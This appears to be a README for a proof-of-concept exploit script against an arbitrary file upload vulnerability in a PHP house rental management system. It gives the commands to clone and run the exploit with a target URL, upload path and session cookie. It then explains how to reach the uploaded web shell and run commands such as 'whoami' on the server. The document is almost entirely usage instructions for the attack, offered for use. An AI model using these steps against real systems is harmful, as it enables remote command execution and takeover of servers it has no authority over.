This Python script demonstrates how to exploit the arbitrary file upload vulnerability in Best House Rental Management System 1.0. The vulnerability allows an attacker to upload a malicious file (such as a PHP web shell) and execute arbitrary commands on the target server.
-
Clone the repository and navigate into the directory:
git clone https://github.com/yourusername/house-rental-poc.git cd house-rental-poc
Run the exploit with the following parameters:
bash
python exploit_house_rental.py <target_url> <file_upload_path> <session_cookie>
target_url: The URL of the vulnerable file upload page (e.g., http:///rental/admin_class.php?view=save_settings) file_upload_path: The path where the uploaded files are stored (e.g., http:///path/to/uploaded/files) session_cookie: The session cookie of the authenticated user
If successful, you will be able to execute commands on the target server by visiting:
bash
http://<file_upload_path>/shell.php?cmd=whoami
Test it by executing commands such as whoami or uname -a.
Example
python exploit_house_rental.py http://127.0.0.1/rental/admin_class.php?view=save_settings http://127.0.0.1/uploads/ SESSION_ID=123456789
This code is released under the MIT License.